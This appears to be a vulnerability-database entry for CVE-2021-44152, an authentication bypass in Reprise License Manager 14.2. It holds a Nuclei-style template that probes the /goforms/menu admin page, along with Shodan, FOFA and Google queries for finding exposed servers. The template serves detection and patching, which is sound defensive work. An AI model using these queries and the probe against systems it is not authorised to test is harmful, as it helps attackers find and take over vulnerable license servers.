CVE-2021-44152: Reprise License Manager 14.2 - Authentication Bypass

2025-08-01 Reprise License Manager PoC Public

Description

Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.

PoC

id: CVE-2021-44152

info:
  name: Reprise License Manager 14.2 - Authentication Bypass
  author: Akincibor
  severity: critical
  description: |
    Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the Reprise License Manager.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of Reprise License Manager to mitigate this vulnerability.
  reference:
    - https://reprisesoftware.com/admin/rlm-admin-download.php?&euagree=yes
    - http://packetstormsecurity.com/files/165186/Reprise-License-Manager-14.2-Unauthenticated-Password-Change.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44152
    - https://www.reprisesoftware.com/RELEASE_NOTES
    - https://github.com/anonymous364872/Rapier_Tool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-44152
    cwe-id: CWE-306
    epss-score: 0.58555
    epss-percentile: 0.99052
    cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: reprisesoftware
    product: reprise_license_manager
    shodan-query:
      - http.html:"Reprise License Manager"
      - http.html:"reprise license"
      - http.html:"reprise license manager"
    fofa-query:
      - body="reprise license manager"
      - body="reprise license"
    google-query: inurl:"/goforms/menu"
  tags: cve,cve2021,packetstorm,rlm,auth-bypass,reprisesoftware,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/goforms/menu"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "RLM Administration Commands"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c3bda5aa7c1337e72c1a8fb4ace8e0770249c09e15f4df47319c31c441aad8ed0220667d0074ada85db7f03f55aaac583818a4f4625b801a0ca82c49c5ee330039fb:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities